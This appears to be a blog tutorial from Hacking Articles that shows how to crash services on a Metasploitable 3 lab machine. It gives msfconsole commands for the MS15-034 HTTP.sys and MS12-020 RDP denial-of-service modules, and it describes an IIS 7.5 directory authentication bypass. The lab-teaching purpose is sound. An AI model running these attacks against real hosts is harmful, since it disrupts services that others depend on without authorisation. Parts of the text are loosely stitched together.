As we know, port 3389 is badly affected by DoS attacks. Moreover, Microsoft IIS 7.5 has Classic ASP configured (it allows serving .asp files). There is a password-protected directory configured that has administrative ASP scripts inside. When an attacker requests the directory with $i30:$INDEX_ALLOCATION appended to the directory name, IIS 7.5 executes the ASP script without asking for proper credentials.

https://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongad

Use the Nessus tool to scan the target PC for vulnerabilities. The scan result shows two high-severity vulnerabilities to exploit.

Start the Metasploit framework by typing msfconsole in a Kali Linux terminal; when Metasploit has loaded, type the following commands for the DoS attack.

This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial of service.

msf > use auxiliary/dos/http/ms15_034_ulonglongadd

msf auxiliary(ms15_034_ulonglongadd) >set rhosts 192.168.1.14

msf auxiliary(ms15_034_ulonglongadd) >exploit

In the same way we'll carry out a DoS attack against the RDP service on port 3389 using another module.

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 Connect MCSPDU packet is handled in the maxChannelIDs field, which will result in an invalid pointer being used, therefore causing a denial-of-service condition.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(ms12_020_maxchannelids) >set rhost 192.168.1.14

msf auxiliary(ms12_020_maxchannelids) >set rport 3389

msf auxiliary(ms12_020_maxchannelids) >exploit

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a Social Media and Gadgets Lover. Contact here.

The post Perform DOS Attack on Metasploitable 3 appeared first on Hacking Articles.
